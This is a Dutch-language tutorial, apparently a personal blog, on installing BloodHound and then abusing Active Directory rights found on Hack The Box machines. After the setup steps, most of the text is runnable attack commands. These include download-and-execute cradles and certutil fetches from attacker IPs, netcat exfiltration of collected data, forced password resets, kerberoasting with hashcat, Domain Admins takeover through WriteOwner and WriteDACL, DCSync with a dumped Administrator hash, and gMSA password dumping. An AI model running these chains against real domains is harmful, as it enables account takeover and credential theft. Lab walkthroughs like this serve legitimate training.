Intro
Ik heb de afgelopen maanden een paar mensen gehad die me vroegen hoe ik Bloodhound aan de praat kon krijgen nadat ik haar aanbevolen heb sinds ik de video “Six Degrees to Domain Admin” zag van BSIDES Las Vegas. Als je de video waarnaar ik verwijs nog steeds niet heb gezien, stel ik voor dat je een kijkje neemt voordat je doorgaat.
Het is echt zo’n geweldig hulpmiddel en ik raad het ten zeerste aan niet alleen info-sec professionals, maar aan iedereen die een Active Directory-omgeving beheert.
Het geweldige nieuws is dat Bloodhound zich nu in de Kali Linux-repository bevindt en super gemakkelijk is te installeren is ,ik zal je laten zien hoe.
Zorg voor een up-to-date systeem.
Zorg er ten eerste voor dat u de nieuwste en beste gebruikt door een dist-upgrade zoals deze uit te voeren.
apt-get update
en toen
apt-get dist-upgrade
Bloodhound installeren
docker pull bannsec/bloodhound
xhost + && sudo docker run -it –rm -v /tmp/.X11-unix/:/tmp/.X11-unix -e DISPLAY=$DISPLAY –network host –device /dev/dri/card0 –name bloodhound bannsec/bloodhound
Je raadt het al, voer gewoon het volgende uit. Bloodhound is afhankelijk van neo4j, dus dat wordt ook geïnstalleerd
sudo su sudo apt update sudo apt install bloodhound sudo apt install --fix-missing sudo apt autoremove sudo neo4j console bloodhound
┌──(puck㉿kali)-[~/htb/forest] └─$
sudo neo4j console
[sudo] password for puck: Directories in use: home: /usr/share/neo4j config: /usr/share/neo4j/conf logs: /etc/neo4j/logs plugins: /usr/share/neo4j/plugins import: /usr/share/neo4j/import data: /etc/neo4j/data certificates: /usr/share/neo4j/certificates licenses: /usr/share/neo4j/licenses run: /var/lib/neo4j/run Starting Neo4j. 2023-09-15 08:05:24.367+0000 INFO Starting... 2023-09-15 08:05:25.022+0000 INFO This instance is ServerId{92cfff9d} (92cfff9d-9e77-43cf-8250-14599494dafa) 2023-09-15 08:05:26.659+0000 INFO ======== Neo4j 4.4.16 ======== 2023-09-15 08:05:28.198+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT 2023-09-15 08:05:28.198+0000 INFO Updating the initial password in component 'security-users' 2023-09-15 08:05:29.591+0000 INFO Bolt enabled on localhost:7687. 2023-09-15 08:05:30.583+0000 INFO Remote interface available at http://localhost:7474/ 2023-09-15 08:05:30.588+0000 INFO id: 04041C31941446C7F36E5A8D01DEEEBF83D5E47EED7F11BABE22F4496217ECC9 2023-09-15 08:05:30.589+0000 INFO name: system 2023-09-15 08:05:30.589+0000 INFO creationDate: 2023-08-17T14:13:48.893Z 2023-09-15 08:05:30.589+0000 INFO Started. 2023-09-15 08:05:48.151+0000 WARN The client is unauthorized due to authentication failure.
Laat de hond het bloed zien
Open een nieuw terminalvenster en voer het volgende commando uit om Bloodhound te starten, laat de Neo4j-console draaien om voor de hand liggende redenen.
bloodhound
Zoals u kunt zien, is Bloodhound nu actief en wacht het op gebruikersinvoer. Eerder bij het lanceren van Neo4j werd ook Bolt on bolt ingeschakeld: //127.0.0.1: 7687. U moet dit gebruiken als uw database-URL.
Als eerste Neo4j login wijzigen via : http://localhost:7474/browser/
- Database-URL – http: //127.0.0.1: 7687
- Gebruikersnaam – neo4j
- Wachtwoord – uw nieuw gewijzigde wachtwoord
Druk op login en je zou de Bloodhound-tool moeten zien, minus alle gegevens. U kunt nu uw gegevens importeren en analyseren.
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
powershell -command “IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.16.70/SharpHound.ps1’); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer ‘svc_****mgr’ -LdapPass ‘Money********worldgoround!'”
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
download 20200218102507_BloodHound.zip
Info: Downloading 20200218102507_BloodHound.zip to 20200218102507_BloodHound.zip Info: Download successful!
Hopelijk was dit een leuke en snelle gids om iedereen te helpen die problemen had om aan de slag te gaan met de geweldige tool die Bloodhound is.
Ik wil ook even de tijd nemen om @ _wald0 , @CptJesus en @ harmj0y te bedanken voor hun voortdurende harde werk aan dit geweldige project.
Gezondheid mannen!
Nog even een voorbeeld :
data verkrijgen:
upload SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
upload /root/htb/SharpHound.ps1 C:\Users\svc-alfresco\Documents
Info: Uploading /root/htb/SharpHound.ps1 to C:\Users\svc-alfresco\Documents Data: 1226060 bytes of 1226060 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Import-module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Invoke-BloodHound -CollectionMethod all -Domain htb.local -LdapUser svc-alfresco -LdapPass s3rvice
nadat dit gedaan te hebben, hebben we een zip. Deze kunnen we downloaden met evil-winrm
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
download C:\Users\svc-alfresco\Documents\20200102015742_BloodHound.zip /root/htb/puckiestyle.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20200102015742_BloodHound.zip to /root/htb/puckiestyle.zip
Info: Download successful!
En het vervolgens importeren in bloodhound
Gebruikte bestanden : https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1
Via Windows kan het ook prima 🙂
https://bloodhound.readthedocs.io/en/latest/installation/windows.html#download-the-bloodhound-gui
Install Java
- Download the Windows installer for Oracle JDK 11 from https://www.oracle.com/java/technologies/javase-jdk11-downloads.html
- Use the installer to install Oracle JDK. The default options work fine.
Install neo4j
- Download the neo4j Community Server Edition zip from https://neo4j.com/download-center/#community
- Unzip the neo4j zip file.
- Open a command prompt, running as administrator. Change directory to the unzipped neo4j folder.
- Change directory to the bin directory in the Neo4j folder.
- Run the following command:
C:\> neo4j.bat install-service
Note
At this point you may see an error about Java not being found, or the wrong version of Java running. Ensure your JAVA_HOME environment variable is set to the JDK folder (example: C:\Program Files\Java\jdk-11.0.6
- neo4j is now installed as a Windows service. Run this command:
C:\> net start neo4j
You should see the message, “The neo4j Graph Database – neo4j service was started successfully.”
- Open a web browser and navigate to http://localhost:7474/. You should see the neo4j web console.
- Authenticate to neo4j in the web console with username neo4j, password neo4j. You’ll be prompted to change this password.
Download the BloodHound GUI
- Download the latest version of the BloodHound GUI from https://github.com/BloodHoundAD/BloodHound/releases
- Unzip the folder and double click BloodHound.exe
- Authenticate with the credentials you set up for neo4j
D:\OSCP\htb\outdated>SharpHound.exe -c All --zipfilename output.zip
2022-08-26T14:15:51.7087720+02:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-08-26T14:15:51.9326143+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-08-26T14:15:52.0604128+02:00|INFORMATION|Initializing SharpHound at 14:15 on 26-8-2022
2022-08-26T14:15:53.2848648+02:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-08-26T14:15:53.6763944+02:00|INFORMATION|Beginning LDAP search for ngblunetworks.nl
2022-08-26T14:15:54.1498180+02:00|INFORMATION|Producer has finished, closing LDAP channel
2022-08-26T14:15:54.1548050+02:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-08-26T14:16:24.0620098+02:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2022-08-26T14:16:36.5523797+02:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2022-08-26T14:16:36.9281631+02:00|INFORMATION|Output channel closed, waiting for output task to complete
2022-08-26T14:16:37.9011893+02:00|INFORMATION|Status: 386 objects finished (+386 8.772727)/s -- Using 50 MB RAM
2022-08-26T14:16:37.9011893+02:00|INFORMATION|Enumeration finished in 00:00:44.2297784
2022-08-26T14:16:38.1309649+02:00|INFORMATION|Saving cache with stats: 349 ID to type mappings.
353 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-08-26T14:16:38.1428971+02:00|INFORMATION|SharpHound Enumeration Completed at 14:16 on 26-8-2022! Happy Graphing!
D:\OSCP\htb\outdated>
.
We kunnen ook bloodhound python gebruiken om info via LDAP te extracten mbv bloodhound-python zoals hieronder , alle info is in JSON formaat, deze kunnen we ook in Bloodhound importeren.
pip install bloodhound
$
pip install bloodhound
$ bloodhound-python -c ALL -u TED.GRAVES -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248
INFO: Found AD domain: intelligence.htb INFO: Connecting to LDAP server: intelligence.htb INFO: Found 1 domains
Nog wat voorbeelden
Abusing ForceChangePassword
BloodHound’s hulp op ForceChangePassword
kan geladen worden door rechts te klikken op het label:
We hebben PowerView.ps1 nodig voor de noodzakelijke functies.
upload /opt/PowerView.ps1
Import-Module .\PowerView.ps1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity smith -AccountPassword $UserPassword
Abusing GenericWrite
To abuse GenericWrite, we hebben 2 opties. Ten eerste kunnen we een service-principalnaam instellen en dat account kerberoasten. Ten tweede kunnen we objecten instellen zoals een aanmeldingsscript dat wordt uitgevoerd bij de volgende keer dat een account inlogt.
We kunnen een SPN instellen zoals hieronder:,
Import-Module .\Powerview.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)
Set-DomainObject -Credential $Cred -Identity maria -SET @{serviceprincipalname='foobar/xd'}
setspn.exe -t object.local -q */*
Het werkt.
Let’s kerberoast it using rubeus.
.\rubeus.exe kerberoast /creduser:object.local\smith /credpassword:Password123!
hashcat -m 13100 -a 0 maria3.hash /opt/rockyou.txt
We kraken het en bezitten Maria, denk je toch? . Ze hebben eigenlijk een script ingesteld dat Maria’s aanmeldingsscript regelmatig uitvoert, zodat Maria niet echt inlogt, maar haar script wordt nog steeds uitgevoerd.
Setting the logon script
We kunnen een aanmeldingsscript instellen zoals hieronder:,
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)
cd C:\\Windows\\System32\\spool\\drivers\\color
echo 'whoami > C:\\Windows\\System32\\spool\\drivers\\color\\poc.txt' > foo.ps1
Set-DomainObject -Credential $Cred -Identity maria -SET @{scriptpath='C:\\Windows\\System32\\spool\\drivers\\color\\foo.ps1'}
Abusing WriteOwner
We veranderen het ownership van “Domain Admins” group zoals hieronder,
$SecPassword = ConvertTo-SecureString 'W3llcr4ft3d_4cls' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential('object.local\maria', $SecPassword)
Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity maria
De eigenaar van het object “Domeinbeheerders” is nu maria, maar we kunnen onze gebruikers nog steeds niet toevoegen aan de groep “Domeinbeheerders”. Ook daar moeten we toestemming voor geven.
We kunnen het ook controleren met Bloodhound en zoals je kunt zien, hebben we nu de “Domeinbeheerders”.
Laten we alle rechten aan Maria geven [ abuse WriteDACL ]
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All -Verbose
net group "Domain Admins" maria /add
of
Om het eigendom van het object te wijzigen, kunt u de functie Set-DomainObjectOwner in PowerView gebruiken.
Mogelijk moet u zich bij de domeincontroller verifiëren als JDGODD@STREAMIO.HTB als u geen proces als die gebruiker uitvoert. Om dit in combinatie met Set-DomainObjectOwner te doen, maakt u eerst een PSCredential-object (deze voorbeelden komen uit de PowerView-helpdocumentatie):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Gebruik vervolgens Set-DomainObjectOwner en geef optioneel $Cred op als u nog geen proces uitvoert als JDGODD@STREAMIO.HTB:
Set-DomainObjectOwner -Credential $Cred -TargetIdentity “Domeinbeheerders” -OwnerIdentity harmj0y
Om het eigendom van een gebruikersobject te misbruiken, kunt u uzelf het privilege AddMember verlenen. Dit kan worden bereikt met behulp van de functie Add-DomainObjectAcl in PowerView.
Mogelijk moet u zich bij de domeincontroller verifiëren als JDGODD@STREAMIO.HTB als u geen proces als die gebruiker uitvoert. Om dit in combinatie met Add-DomainObjectAcl te doen, maakt u eerst een PSCredential-object (deze voorbeelden komen uit de PowerView-helpdocumentatie):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Gebruik vervolgens Add-DomainObjectAcl en geef optioneel $Cred op als u nog geen proces uitvoert als JDGODD@STREAMIO.HTB:
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -Rights WriteMembers
U kunt nu leden aan de groep toevoegen met behulp van het netto binaire bestand of PowerView’s Add-DomainGroupMember.
Er zijn minstens twee manieren om deze aanval uit te voeren. De eerste en meest voor de hand liggende is door het ingebouwde binaire bestand net.exe in Windows te gebruiken (bijv.: net group “Domain Admins” harmj0y /add /domain). Zie het tabblad Opsec-overwegingen waarom dit een slecht idee kan zijn. De tweede en sterk aanbevolen methode is door de functie Add-DomainGroupMember in PowerView te gebruiken. Deze functie is op verschillende manieren superieur aan het gebruik van het binaire bestand net.exe. U kunt bijvoorbeeld alternatieve referenties opgeven, in plaats van een proces uit te voeren als of in te loggen als de gebruiker met het privilege AddMember. Bovendien heb je veel veiligere uitvoeringsopties dan met spawning net.exe (zie het tabblad opsec).
Om misbruik te maken van dit recht met PowerView’s Add-DomainGroupMember, importeert u eerst PowerView in uw agentsessie of in een PowerShell-instantie op de console. Mogelijk moet u zich bij de domeincontroller verifiëren als JDGODD@STREAMIO.HTB als u geen proces als die gebruiker uitvoert. Om dit te doen in combinatie met Add-DomainGroupMember, maakt u eerst een PSCredential-object (deze voorbeelden komen uit de PowerView-helpdocumentatie):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Gebruik vervolgens Add-DomainGroupMember, waarbij u optioneel $Cred opgeeft als u nog geen proces uitvoert als JDGODD@STREAMIO.HTB:
Add-DomainGroupMember -Identiteit ‘Domain Admins’ -Leden ‘harmj0y’ -Credential $Cred
Controleer ten slotte of de gebruiker met succes aan de groep is toegevoegd met PowerView’s Get-DomainGroupMember:
Get-DomainGroupMember -Identiteit ‘Domeinbeheerders’
Opruimen hiervoor kan worden gedaan met Remove-DomainObjectAcl
Remove-DomainObjectAcl – Referentie $cred -TargetIdentity “Domain Admins” -Rights WriteMembers
Opruimen voor de eigenaar kan worden gedaan door Set-DomainObjectOwner opnieuw te gebruiken
Abusing GPO WRITEDACL
Deze account is lid van de legacy group, betekenend dat wij abuse WriteDACL kunnen gebruiken op gpoadm, met PowerView
granting GenericAll
op GPOADM
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "GPOADM" -PrincipalIdentity "Amelia.Griffiths" -Verbose
Hierna kunnen we het paswoord wijzigen voor gpoadm
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
Met pyGPOAbuse, kunnen we een scheduled task creeren , uitgevoerd als SYSTEM user om gpoadm in local administrators group toe te voegen (gebruik een python virtual environment, sommige dependencies hadden problemen met de huidige versie van impacket)
git clone https://github.com/ShutdownRepo/impacket -b dacledit sudo apt install python3.11-venv\n cd impacket python3 -m venv venv source venv/bin/activate pip3 install . ls getTGT.py absolute.htb/m.lovegod:'AbsoluteLDAP2022!'
Abusing DC-SYNC
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\puck', $SecPassword) *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity puck -Credential $cred -Rights DCSync *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
┌─[puck@parrot-lt]─[~/htb/forest]
└──╼ $python3 secretsdump.py htb/puck@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation Password:abc123! [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Abusing ReadGMSAPassword
We kunnen zien dat onze gebruiker lid is van de ITSUPPORT-groep, die ReadGMSAPassword-rechten heeft SVC_INT die op zijn beurt AllowedToDelegate-rechten heeft voor de domeincontroller. We kunnen de gMSADumper-tool om de hash van het serviceaccount wachtwoord te verkrijgen:
ssh tom@10.10.10.77
1ts-mag1c!!!
powershell -ep bypass
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.10/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All
.
c:\Windows\Temp>certutil.exe -urlcache -f http://10.10.14.14/SharpHound.exe SharpHound.exe **** Online **** CertUtil: -URLCache command completed successfully. c:\Windows\Temp>Sharphound -c all b''2022-09-07T09:18:58.6558733-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound c:\Windows\Temp>certutil.exe -urlcache -f http://10.10.14.14/nc64.exe nc64.exe **** Online **** CertUtil: -URLCache command completed successfully.
┌─[puck@kali]─[~/htb/intelligense
└──╼ sudo apt install bloodhound.py
└──╼ bloodhound-python -h
└──╼ $bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c All
└──╼ $git clone https://github.com/micahvandeusen/gMSADumper
└──╼ $python3 gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248
PS C:\users\amanda\appdata\local\temp> iex(new-object net.webclient).downloadstring('http://10.10.14.4/SharpHound.ps1')
PS C:\users\amanda\appdata\local\temp> invoke-bloodhound -collectionmethod all
sudo impacket-smbserver -smb2support share . -username puck -password puck
PS htb\amanda@SIZZLE Documents> net use \\10.10.14.4\share /u:puck puck
PS C:\windows\temp> copy 20220918132203_BloodHound.zip \\10.10.14.4\share
PS C:\Temp> (New-Object System.Net.WebClient).DownloadFile("http://10.10.14.9/SharpHound.exe", "c:\temp\sh.exe")
──╼ $nc -nlvp 9001 > 1.zip
listening on [any] 9001 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.168] 62793
C:\Temp>nc.exe 10.10.14.9 9001 < 20221020114501_BloodHound.zip
nc.exe 10.10.14.9 9001 < 20221020114501_BloodHound.zip
bash-5.1$ impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip dc.absolute.htb Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation [*] Saving ticket in m.lovegod.ccache bash-5.1$ export KRB5CCNAME=m.lovegod.ccache bash-5.1$ /opt/BloodHound.py-Kerberos/bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.10.11.181 --dns-tcp --zip -c All -no-pass INFO: Found AD domain: absolute.htb INFO: Using TGT from cache INFO: Found TGT with correct principal in ccache file. INFO: Connecting to LDAP server: dc.absolute.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.absolute.htb INFO: Found 18 users INFO: Found 55 groups INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.absolute.htb INFO: Ignoring host dc.absolute.htb since its reported name does not match INFO: Done in 00M 10S INFO: Compressing output into 20230615222455_bloodhound.zip bash-5.1$
Abusing user MICHAEL@redacted.xxx has the capability to change the user BENJAMIN@redacted.xxx’s password without knowing that user’s current password.
Import-Module .\PowerView.ps1 $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword
Abusing user EMILY@redacted.xxx has generic write access to the user ETHAN@redacted.xxx
python3 /home/puck/vulnlab/delegate/targetedKerberoast/targetedKerberoast.py -v -d 'redacted.xxx' -u 'emily' -p 'U<redacted>b'
Auteur: Jacco Straathof